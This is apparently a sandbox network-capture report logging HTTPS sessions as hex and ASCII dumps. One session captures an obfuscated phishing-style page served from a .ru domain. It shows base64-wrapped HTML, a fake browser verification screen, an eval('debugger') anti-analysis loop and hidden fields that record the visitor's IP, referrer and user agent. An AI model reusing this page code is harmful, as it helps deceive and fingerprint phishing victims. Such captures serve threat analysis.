                                                                                  2024-10-02 15:49:41 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 4a 49 52 32 4a 32 5a 44 4a 69 4f 56 6c 48 4e 30 4e 4f 51 32 74 44 63 54 42 34 54 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 6e 56 6a 4e 6d 4a 4e 4d 6b 4e 6d 64 55 78 32 59 6c 4a 51 5a 48 55 79 52 6c 5a 76 55 54 68 45 64 58 70 44 65 44 68 6b 57 6e 46 56 55 32 5a 43 55 6d 68 52 56 31 63 30 51 6b 46 31 62 57 56 46 63 48 68 73 53 6d 5a 72 4b 33 56 53 5a 6c 56 31 4d 45 68 32 64 48 70 4f 51 56 46 5a 55 6c 70 76 4d 54 4a 78 51 7a 46 53 4d 6b 4a 35 62 44 68 69 5a 47 39 4b 4c 79 39 7a 4b 33 64 74 64 54 6b 34 4d 57 30 78 57 48 4a 33 52 31 49 31 62 6b 4e 43 53 48 6c 68 52 6a 6c 43 59 53 74 47 54 6b 55 31 5a 46 68 43 65 46 4e 4f 52 32 38
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlJIR2J2ZDJiOVlHN0NOQ2tDcTB4T1E9PSIsInZhbHVlIjoiMnVjNmJNMkNmdUx2YlJQZHUyRlZvUThEdXpDeDhkWnFVU2ZCUmhRV1c0QkF1bWVFcHhsSmZrK3VSZlV1MEh2dHpOQVFZUlpvMTJxQzFSMkJ5bDhiZG9KLy9zK3dtdTk4MW0xWHJ3R1I1bkNCSHlhRjlCYStGTkU1ZFhCeFNOR28
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 34 35 33 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 69 66 28 22 68 74 74 70 73 3a 2f 2f 49 38 66 67 6a 69 2e 61 66 6f 72 65 6e 6f 74 65 64 63 2e 72 75 2f 6f 42 56 62 6f 42 44 5a 6f 45 38 6e 6e 39 4c 6e 70 38 65 42 73 2f 22 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 54 64 57 4e 6a 5a 58 4e 7a 49 47 6c 7a 49 47 64 6c 64 48 52 70 62 6d 63 67 64 32 68 68 64 43 42 35 62 33 55 67 64 32 46 75 64 43 77 67 61 47
                                                                                  Data Ascii: 4534<script>if("https://I8fgji.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/" == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gPGRpdj5TdWNjZXNzIGlzIGdldHRpbmcgd2hhdCB5b3Ugd2FudCwgaG
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 5a 32 6c 75 4c 58 52 76 63 44 6f 77 4f 32 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 4d 58 4a 6c 62 54 74 39 44 51 6f 6a 62 31 56 61 55 58 4e 4e 55 57 4e 6e 52 79 35 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 32 39
                                                                                  Data Ascii: Z2luLXRvcDowO21hcmdpbi1ib3R0b206MXJlbTt9DQojb1VaUXNNUWNnRy5jb250YWluZXJ7d2lkdGg6IDEwMCU7cGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI29
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 43 30 74 50 67 6f 38 4c 32 68 6c 59 57 51 2b 44 51 6f 4e 43 6a 78 69 62 32 52 35 49 48 4e 30 65 57 78 6c 50 53 4a 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57 4a 6c 61 47 46 32 61 57 39 79 4f 69 42 6a 62 32 35 30 59 57 6c 75 4f 79 49 2b 44 51 6f 38 49 53 30 74 49 46 46 31 59 57 78 70 64 48 6b 67 61 58 4d 67 62 6d 39 30 49 47 46 75 49 47 46 6a 64 44 73 67 61 58 51 67 61 58 4d 67
                                                                                  Data Ascii: C0tPgo8L2hlYWQ+DQoNCjxib2R5IHN0eWxlPSJmb250LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLWJlaGF2aW9yOiBjb250YWluOyI+DQo8IS0tIFF1YWxpdHkgaXMgbm90IGFuIGFjdDsgaXQgaXMg
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 49 69 50 67 30 4b 50 43 45 74 4c 53 41 38 5a 47 6c 32 50 6c 52 6f 5a 53 42 7a 5a 57 4e 79 5a 58 51 67 62 32 59 67 63 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 30 62 79 42 6b 62 79 42 30 61 47 55 67 59 32 39 74 62 57 39 75 49 48 52 6f 61 57 35 6e 49 48 56 75 59 32 39 74 62 57 39 75 62 48 6b 67 64 32 56 73 62 43 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 36 55 58 4e 34 56 33 56 6d 53 55 5a 34 49 6a 34 4e 43 6b 4e 76 62 6d 52 31 59 33 52 70 62 6d 63 67 64 6d 56 79 61 57 5a 70 59 32 46 30 61 57 39 75 49 47 4e 6f 5a 57 4e 72 63 79 42 76 62 69 42 35 62 33 56 79 49 47 4a 79 62
                                                                                  Data Ascii: IiPg0KPCEtLSA8ZGl2PlRoZSBzZWNyZXQgb2Ygc3VjY2VzcyBpcyB0byBkbyB0aGUgY29tbW9uIHRoaW5nIHVuY29tbW9ubHkgd2VsbC48L2Rpdj4gLS0+CjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0idGV4dC1jZW50ZXIiIGlkPSJ6UXN4V3VmSUZ4Ij4NCkNvbmR1Y3RpbmcgdmVyaWZpY2F0aW9uIGNoZWNrcyBvbiB5b3VyIGJyb
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 79 4f 54 55 31 4e 7a 59 34 4d 7a 6b 7a 4e 54 6b 34 56 47 4e 76 62 32 39 4c 56 30 31 52 52 6c 4a 53 56 6c 52 58 52 6c 4a 53 57 55 78 56 51 31 42 53 56 31 42 44 52 46 6c 4e 57 55 5a 4c 55 45 68 4b 53 31 46 4d 52 55 52 47 55 45 46 4a 54 56 46 43 54 55 6c 4e 53 6b 52 56 51 31 4e 53 4a 79 77 67 65 77 30 4b 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6b 64 46 56 43 49 73 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6e 52 6c 65 48 51 6f 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 64 47 56 34 64 43 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 63 32 39 73 5a 53 35 73 62 32 63 6f 64 47
                                                                                  Data Ascii: yOTU1NzY4MzkzNTk4VGNvb29LV01RRlJSVlRXRlJSWUxVQ1BSV1BDRFlNWUZLUEhKS1FMRURGUEFJTVFCTUlNSkRVQ1NSJywgew0KICAgIG1ldGhvZDogIkdFVCIsDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgcmV0dXJuIHJlc3BvbnNlLnRleHQoKQ0KICAgIH0pLnRoZW4odGV4dCA9PiB7DQogICAgY29uc29sZS5sb2codG
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 63 77 62 76 79 4b 7a 71 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 63 6f 6e 73 74 20 6c 7a 59 65 4d 6c 62 6b 6f 47 20 3d 20 6e 65 77 20 55 52 4c 28 22 68 74 74 70 73 3a 2f 2f 49 38 66 67 6a 69 2e 61 66 6f 72 65 6e 6f 74 65 64 63 2e 72 75 2f 6f 42 56 62 6f 42 44 5a 6f 45 38 6e 6e 39 4c 6e 70 38 65 42 73 2f 22 29 3b 0d 0a 63 6f 6e 73 74 20 73 57 61 46 73 58 6c 50 57 42 20 3d 20 6c 7a 59 65 4d 6c 62 6b 6f 47 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 41 4f 63 77 62 76 79 4b 7a 71 20 3f 20 6c 7a 59 65 4d 6c 62 6b 6f 47 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 6c 7a 59 65 4d 6c 62 6b 6f 47 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c
                                                                                  Data Ascii: cwbvyKzq = window.location.hostname.split('.').slice(-2).join('.');const lzYeMlbkoG = new URL("https://I8fgji.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/");const sWaFsXlPWB = lzYeMlbkoG.hostname === AOcwbvyKzq ? lzYeMlbkoG.hostname : lzYeMlbkoG.hostname.spl
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 64 70 5a 48 52 6f 50 57 52 6c 64 6d 6c 6a 5a 53 31 33 61 57 52 30 61 43 77 67 61 57 35 70 64 47 6c 68 62 43 31 7a 59 32 46 73 5a 54 30 78 4c 6a 41 69 50 67 30 4b 49 43 41 67 49 44 78 30 61 58 52 73 5a 54 34 6d 49 7a 67 79 4d 44 4d 37 50 43 39 30 61 58 52 73 5a 54 34 4e 43 69 41 67 49 43 41 38 63 33 52 35 62 47 55 2b 44 51 70 69 62 32 52 35 49 48 73 4e 43 69 41 67 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 73 4e 43 69 41 67 61 47 56 70 5a 32 68 30 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 42 76 64 6d 56 79 5a 6d 78 76 64 7a 6f 67 61 47 6c 6b 5a 47 56 75 4f 77 30 4b 66 51 30 4b 49 32 39 56 57 6c 46 7a 54 56 46 6a 5a 30 63 67 61 44 52 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 77 4f 32 31 68 63 6d 64 70 62
                                                                                  Data Ascii: dpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4NCiAgICA8c3R5bGU+DQpib2R5IHsNCiAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZjsNCiAgaGVpZ2h0OiAxMDAlOw0KICBvdmVyZmxvdzogaGlkZGVuOw0KfQ0KI29VWlFzTVFjZ0cgaDR7bWFyZ2luLXRvcDowO21hcmdpb
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 52 63 30 31 52 59 32 64 48 49 43 4e 36 55 58 4e 34 56 33 56 6d 53 55 5a 34 49 48 74 6a 62 32 78 76 63 6a 6f 67 49 7a 5a 6a 4e 7a 55 33 5a 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4d 54 52 77 65 44 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 75 4e 58 4a 6c 62 54 74 39 44 51 6f 67 49 43 41 67 50 43 39 7a 64 48 6c 73 5a 54 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 50 67 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 43 67 70 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 42 6a 62 32 35 7a 64 43 42 30 4d 43 41 39 49 45 52 68 64 47 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 5a 58 5a 68 62 43 67 6e 5a 47 56 69 64 57 64 6e 5a 58 49 6e 4b 54 73 4e 43 69 41 67 49 43 42 6a 62 32 35 7a 64 43 42 30 4d 53 41 39 49 45
                                                                                  Data Ascii: Rc01RY2dHICN6UXN4V3VmSUZ4IHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIHNldEludGVydmFsKCgpID0+IHsNCiAgICBjb25zdCB0MCA9IERhdGUubm93KCk7DQogICAgZXZhbCgnZGVidWdnZXInKTsNCiAgICBjb25zdCB0MSA9IE
                                                                                  2024-10-02 15:49:41 UTC1369INData Raw: 61 57 35 72 49 69 42 75 59 57 31 6c 50 53 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 61 58 41 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35
                                                                                  Data Ascii: aW5rIiBuYW1lPSJwYWdlbGluayIgdmFsdWU9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGlwIiBuYW1lPSJibHRkaXAiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.449753184.28.90.27443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:41 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  Accept-Encoding: identity
                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                  Host: fs.microsoft.com
                                                                                  2024-10-02 15:49:41 UTC466INHTTP/1.1 200 OK
                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                  Content-Type: application/octet-stream
                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                  Server: ECAcc (lpl/EF06)
                                                                                  X-CID: 11
                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                  X-Ms-Region: prod-neu-z1
                                                                                  Cache-Control: public, max-age=89769
                                                                                  Date: Wed, 02 Oct 2024 15:49:41 GMT
                                                                                  Connection: close
                                                                                  X-CID: 2


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.449758104.17.24.144433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:42 UTC564OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                  Host: cdnjs.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:42 UTC938INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:42 GMT
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: public, max-age=30672000
                                                                                  ETag: W/"61182885-40eb"
                                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Timing-Allow-Origin: *
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 495684
                                                                                  Expires: Mon, 22 Sep 2025 15:49:42 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYRCOLzhF9mMN6vKv3yHIE06m%2FbltgjstDHH%2BWzNbNnmZU05H8nrwZE7xAMquFwZVxmgqz9EG%2BdHlvFOk%2FygCQHtA%2FMf3WnGF%2FwuDsASBS%2FdlHuLzYAGYqp8dEl%2BqEcfimBXBwbB"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d80a7fff1a0b-EWR
                                                                                  2024-10-02 15:49:42 UTC431INData Raw: 37 62 66 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                  Data Ascii: 7bf5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75
                                                                                  Data Ascii: his.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){retu
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42
                                                                                  Data Ascii: ords=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomB
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73
                                                                                  Data Ascii: ),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcess
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38
                                                                                  Data Ascii: _C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+88
